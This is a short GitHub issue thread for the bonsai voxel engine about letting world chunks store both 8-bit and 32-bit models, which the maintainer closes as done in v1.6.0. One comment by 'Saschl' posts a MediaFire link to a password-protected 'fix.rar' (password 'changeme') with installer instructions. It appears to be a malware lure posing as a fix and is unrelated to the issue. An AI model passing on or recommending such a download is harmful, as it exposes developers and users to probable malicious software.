### ISSUE TITLE
world_chunk needs to be able to store both 8 and 32-bit models 

### ISSUE THREAD

**Issue by scallyw4g** [scallyw4g/bonsai#71]
In some cases we want to use world chunks for things other than actual world chunk data because their a convenient storage format.  For example, saving out a new asset from a selection does this.  Also, the brush previews.  Maybe more places I'm forgetting right now.

The problem with this is that right now they're hard-coded to use the compressed 8-bit type, but that means models and brush previews cannot be more than 256 voxels large in any one dimension, or they overflow.

Should be pretty easy to add a d_union for this kinda thing.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scallyw4g** [comment]
done in v1.6.0
